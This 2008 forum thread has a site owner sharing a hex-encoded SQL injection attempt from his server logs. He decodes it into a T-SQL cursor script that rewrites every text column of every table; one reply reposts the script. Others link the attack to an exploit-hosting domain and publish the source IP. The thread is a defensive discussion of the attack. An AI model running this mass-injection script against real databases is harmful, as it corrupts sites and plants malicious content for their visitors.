lordkafei Posted August 26, 2008 Share Posted August 26, 2008 I run a small niche site (nothing to do with Runescape or gaming). Tonight, while looking at my logs, I noticed someone trying to reach a strange URL: http://[my site url was here]/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152 ... After decoding all that hex, I got this: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"> PvP is not for meIn the 3rd Year of the BoycottReal-world money saved since FT/W: Hundreds of DollarsReal-world time saved since FT/W: Thousands of Hours Link to comment Share on other sites More sharing options...
Orpheus Posted August 26, 2008 Share Posted August 26, 2008 From what I can see, and the fact I'm an amateur, I'd daresay it's a keylogger, an injection attack, a tracker, or a rootkit. Try not to go to the website in the hex, I can't guarantee it's a clean link. I was going to eat hot dogs for dinner tonight. I think I will settle for cereal. OPEN WIDE HERE COMES THE HELICOPTER. Link to comment Share on other sites More sharing options...
urbestfreind Posted August 26, 2008 Share Posted August 26, 2008 http://www.siteadvisor.com/sites/douhunqn.cn Check the comment on the bottom. ultimania92 was right on almost all counts there lol, that site (and all the ones it links to apparently) has links to browser exploits. Just google search douhunqn.cn, the results pretty much confirm what the SiteAdvisor site said. [hide=Funny Quotes]So you sucker punched a kid in the back of the head? Good job.What scares me is that you're like 10 years old.-.- im not that freaking youngYou were a couple years ago.It's not racist if its true.Hmm... I wonder how one goes about throwing someone out a window in a mystic fashion :-k The mental image for that is freaking awesome.[/hide]- I dont need to "get a life." I'm a gamer - I have LOTS of lives! Link to comment Share on other sites More sharing options...
lordkafei Posted August 27, 2008 Author Share Posted August 27, 2008 Thanks for the info. The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet. 141.158.58.64 PvP is not for meIn the 3rd Year of the BoycottReal-world money saved since FT/W: Hundreds of DollarsReal-world time saved since FT/W: Thousands of Hours Link to comment Share on other sites More sharing options...
Orpheus Posted August 27, 2008 Share Posted August 27, 2008 Thanks for the info. The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet. 141.158.58.64 That would be just about right, why he didn't hide his IP though is beyond me. I was going to eat hot dogs for dinner tonight. I think I will settle for cereal. OPEN WIDE HERE COMES THE HELICOPTER. Link to comment Share on other sites More sharing options...
Sinkhan Posted August 27, 2008 Share Posted August 27, 2008 Well generally, people who are unknowingly infected and become a part of a botnet don't try to hide their IP. These people are usually the one's who don't know what botnets are and leave their computer open to them in the first place. Something to fill my sig with until I find a replacement.Also check out my blug Link to comment Share on other sites More sharing options...
D. V. Devnull Posted August 28, 2008 Share Posted August 28, 2008 Thanks for the info. The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet. 141.158.58.64 You're right on, lordkafei. It is a person who didn't properly protect their PC, and is currently an unknowing host to a bot on their system. Further info is at the link below... http://network-tools.com/default.asp?prog=express&host=141.158.58.64 (Note: I don't provide bad links. It is clean, so go have a look!) I suggest that you note the date and time of when the attack occurred, and get in touch with Verizon in Philadelphia. They will be able to put an end to this problem, forever. :ugeek: ~Mr. D. V. Devnull and normally with a cool mind.(Warning: This user can be VERY confusing to some people... And talks in 3rd person for the timebeing due to how insane they are... Sometimes even to themself.) Link to comment Share on other sites More sharing options...
Mainman46 Posted August 28, 2008 Share Posted August 28, 2008 DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"> Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now